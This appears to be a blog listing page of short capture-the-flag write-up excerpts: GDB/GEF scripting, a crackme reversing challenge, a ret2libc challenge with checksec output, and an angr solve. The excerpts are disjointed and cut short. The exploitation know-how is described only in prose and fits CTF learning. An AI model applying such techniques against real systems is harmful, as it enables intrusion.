Recently i’ve been working with GDB scripting, and GDB allows scripting through its python api to automate specific tasks by writing a script that executes debugger commands. Examples include writing a disassembler to perform a disassembly of a VM obfuscated binary during runtime. There are many plugins for GDB, such as peda, gef and pwndbg. GEF is a powerful plugin with many features and the cheatsheet below covers how to use GEF’s API for GDB scripting.
Author : ttlhacker challenge files Description : x86_64 linux binary (tested on debian 9 and ubuntu 18.04, should run on any distro). Takes one command line argument and outputs “OK!” if it’s correct, “Wrong” if it’s not. Partially written in C, actual verification routine is assembly. Don’t patch the binary, of course - find the correct input.
Lets open the binary in radare2 and we’ll look at the disassembly of the main function
Leaking Libc addresses to do ret2libc with unknown libc First lets take a look at the binary mitigations
{} ret2what checksec return-to-what [*] '/home/h4x5p4c3/Downloads/ret2what/return-to-what' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) Nx is enabled so we can’t do a bof and place our shellcode to get a shell and no canary which makes it easier and ASLR is probably enabled.
Decompilation and Disassembly The decompilation of the assembly code looks like this
Failures aren’t the stepping stones to success they’re just stones you’re the one who decides to step them - jones
Analysis This is a simple reversing challenge, we need to find the correct flag. The challenge binary has two conditions which prints SUCCESS if the correct flag is passed and it prints FAILURE if its wrong. we can simulate this pretty easy with angr and find the flag
Decompilaton And looking at the decompilation we see a string compare statement which shows the string we’re looking for is 16 characters